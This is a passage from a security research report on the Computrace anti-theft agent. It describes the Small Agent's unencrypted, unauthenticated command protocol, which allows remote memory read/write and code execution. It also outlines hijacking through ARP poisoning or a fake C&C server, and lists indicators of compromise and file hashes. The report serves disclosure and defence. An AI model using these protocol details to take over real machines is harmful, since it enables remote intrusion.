All packets start and end with a special byte “~” (0x7E). This byte is used as a packet border indicator (packet separator). The following 4-byte field contains an Address of memory to work with. If the packet is of read-type, then the Small Agent will read memory starting from this address. The number of bytes to read is specified in the following Size field (2-bytes long). Each packet is appended with special 3 bytes: 1 byte for Seq value and 2 bytes for Cksum. Seq is a special 8-bit value used as a sequence number that is incremented by server and client according to their sequence algorithm. Cksum is a 2-byte value having a short custom hash of all the fields after packet separator and before the Cksum. IfSeq or Cksum values are not what Small Agent expects, then current requests is disposed and the last response is used instead. A Seq number corresponding to the last response should indicate to the C&C server that the agent has received a corrupted or altered packet and the server should retransmit the request.

The first packet of the server is special and is used for a basic handshake with the client. It looks like this:

The Address field is set to hexadecimal 0xFFFFFFFF, Size is set to 0x0004 and a unique Session IDis chosen by the server. The value of Session ID should be used by the client in all responses to the server. Client response has a fixed format:

Like in the server packets, the response packet must always start and end with a packet separator. The first 4 bytes after that are set to a fixed Session ID value defined by the server in the Handshake Packet. Next, the 2-byte field is the size of Response Data which is following that value. After that Seqand Cksum fields are used as with the server packets.

An additional byte modification rule (escaping) may be applied if any of the fields between the packet separator contain a byte with hex-code 0x7E (which matches the packet separator). In this case the 0x7E byte is transformed into a sequence of two bytes 0x7D 0x5E, which would increase the packet size and affect the checksum. However, interpretation of the packet and calculation of the checksum is only accomplished after unescaping the packet. If the 0x7D byte is met in the packet before escaping, it must also be escaped and 0x7D is replaced with a sequence of 0x7D 0x5D bytes.

This completes the protocol according to what we have observed. The protocol provides two basic primitives:

1. Read operation
2. Write operation

In addition to that, the Handshake Packet provides the basic address of the Session object in the memory of the Small Agent. This might be sufficient to execute arbitrary code. However, on systems with DEP and ASLR enabled some extra steps may significantly ease the process of running code and make the process smoother and more stable. That is why there is extra processing implemented in the Small Agent. Upon receiving and writing data to a defined memory location it checks a special field in the Session object which defines a built-in basic command to execute. If the C&C server changes the value of this field, the agent may run a special command with parameters. The following commands are implemented in the module we analyzed:

• Get handle of a module in memory (calls GetModuleHandleA)
• Get address of an exported procedure (calls GetProcAddress)
• Reserve memory on heap
• Free memory on heap
• Execute chain of commands from memory location
• Call a function with specified memory address and parameters

This adds extra flexibility and allows an engineer to precisely allocate memory, transfer data in it and execute any extra code if required.

The protocol used by the Small Agent provides the basic feature of remote code execution. The protocol doesn’t use any encryption or authorization with the remote server, which creates numerous opportunities for remote attacks in a hostile network environment. Although encryption seems to be added to the protocol at some later stages of communication, an attacker may utilize the basic unencrypted protocol to successfully hijack the system remotely. A typical attack on a local area network would be to redirect all traffic from a computer running Small Agent to the attacker’s host via ARP-poisoning. Another possibility is to use a DNS service attack to trick the agent into connecting to a fake C&C server. We believe there are more ways to accomplish such attacks, though this is beyond the scope of the current research.

7. Conclusions

When we first found and analyzed Computrace we mistakenly thought it was malicious software, because it used so many of the tricks that are popular in current malware. It has specific anti-debugging and anti-reverse engineering techniques, injects into the memory of other processes, establishes secret communication, patches system files on disk (autochk.exe), keeps configuration files encrypted, and finally drops a Windows executable directly from BIOS/firmware.

Such aggressive behavior by Computrace Agent was the reason it was detected as malware in the past. According to some reports on the Internet, Computrace was detected by Microsoft as VirTool:Win32/BeeInject. Here is how Microsoft describes this generic threat name:

Nevertheless, detection of Computrace modules was later removed by Microsoft and some AV vendors. Computrace executables are currently allowlisted by most AV companies.

We believe that Computrace was designed with good intentions, but our research shows that vulnerabilities in this software can turn a useful tool into a powerful weapon for cybercriminals. We believe that such a powerful tool needs to have powerful authentication and encryption mechanisms to continue fighting the good fight.

Although there was no evidence of intentional secret activation of Computrace modules on the computers we analyzed, we believe that the number of computers with Computrace activated may be surprisingly high. We do not believe that Absolute Software or any PC manufacturers have any reason to secretly activate this module, but it’s clear that if there are a lot of computers with activated Computrace Agents, it is the responsibility of the manufacturers and Absolute Software to notify those users and explain how they can deactivate it if they don’t want to use Absolute Software services. Otherwise, these orphaned agents will keep on running unnoticed and provide opportunities for remote exploitation.

8. References

1. http://corelabs.coresecurity.com/index.php?module=Wiki&action=view&type=publication&name=Deactivate_the_Rootkit
2. http://www.absolute.com/en/partners/bios-compatibility
3. http://www.absolute.com/en/resources/whitepapers/absolute-persistence-technology
4. https://www.google.com/patents/US20060272020
5. http://en.wikipedia.org/wiki/LoJack

Appendix A: Indicators of Computrace Agent Activity

1. One of the following processes is running:
   1. rpcnet.exe
   2. rpcnetp.exe
   3. 32-bit svchost.exe running on 64-bit system (can’t serve as complete indicator)
2. One of the following files exist on the hard drive:
   1. %WINDIR%System32rpcnet.exe
   2. %WINDIR%System32rpcnetp.exe
   3. %WINDIR%System32wceprv.dll
   4. %WINDIR%System32identprv.dll
   5. %WINDIR%System32Upgrd.exe
   6. %WINDIR%System32autochk.exe.bak (for FAT)
   7. %WINDIR%System32autochk.exe:bak (for NTFS)
3. The system resolves one of the following domain names using DNS:
   1. search.namequery.com
   2. search.us.namequery.com
   3. search64.namequery.com
   4. bh.namequery.com
   5. namequery.nettrace.co.za
   6. search2.namequery.com
   7. m229.absolute.com or any m*.absolute.com
4. The system connects to the following IP: 209.53.113.223
5. One of the following registry keys exist:
   1. HKLMSystemCurrentControlSetServicesrpcnet
   2. HKLMSystemCurrentControlSetServicesrpcnetp

Appendix B: Related File Hashes

Below are some of files that were discovered as rpcnetp or rpcnet service binaries:

0153ad739956b12bf710c7039186728d
01a19f74cfb19cc61d62009bcfa59961
076a360ee0cfc5ca2afc8468fa1ae709
130206a40741aa57f3778bb70e593e16
19a51da66e818f0e10973e1082c79a70
19e67bd685019dafadfe524517dab145
1f2d10f767c7145a8d2a3fbbf66bed7a
27d43a7f03260ebdf81dd6515646510b
3a1ed2730cee3ec7d6d5091be5071eaa
418f527e59508480cfc17644d8387736
4476ccfd883c603cebbc317c6c41c971
4a3b02ac2e1635c0a4603b32d447fbb2
4bcf98b48bee5e7094d0cf026d4edce4
5235a32d018b79f065c64b06bd4001be
5515c17117a37fc808fc7a43a37128b0
5829887d2304c08237a5f43c42931296
5a5bb037b8e256a3304f113a187b1891
5e071026cb4c890a3584e02af1e3daf8
6846e002291086843463238e525c8aaa
77f57671b08e539e3232bf95a2ac8aec
78c696e5fd0041d8a5ce5e5e15b6f2f3
7a7cd44a4113046869be5ab8341f759f
8282e68524af7a46afc1bac2105c6cda
86332af92a6a80660bb8659711378140
8f95ce32c2596771174f7054a78f4a84
925f2df6a96637d23c677b33a07b52c1
961d7bbefa57d1b260db075404454955
a9e0a97c29bd110f54beb465d8ec3e52
aaaee16f8cbd6a35c0f6b37358b3ce54
b4c3723eb687b0e63aeea2974b8d73ba
b7534d5ed3b01ff3a96b43b855b2a103
bb7ef397f31c184f4089fc9bac04566f
c1b19ad11821780b67f4c545beb270c0
c6089ec6ae62fe264896a91d951d0c79
cacebf514be693301c1498e216b12dbb
cbb0d507e47d7f0ae3e5f61ea8feff08
cde233aa0676f5307949c0a957a2f360
cf8bcf7138cc855d885271c4ee7e8a75
d2561d67e34ff53f99b9eaab94e98e2a
e2e9dcce8d87608e4ba48118b296407f
e57892858a7d3a7799eacb06783bd819
e583977f36980125c01898f9e86c6c87
ed9b58f56a13fbb44c30d18b9b5c44d0
ee08ce8247ffb26416b32d8093fe0775
eeab12e6f535ee0973b3ddb99287e06c
ef8d08b07756edc999fbc8cfac32dc23
f03f740fde80199731c507cdd02eb06e
f259382b6fa22cae7a16d2d100eb29e4
f42dbd110320b72d8ff72f191a78e5d5
fc0ba4c9a301b653ee2c437e29ed545e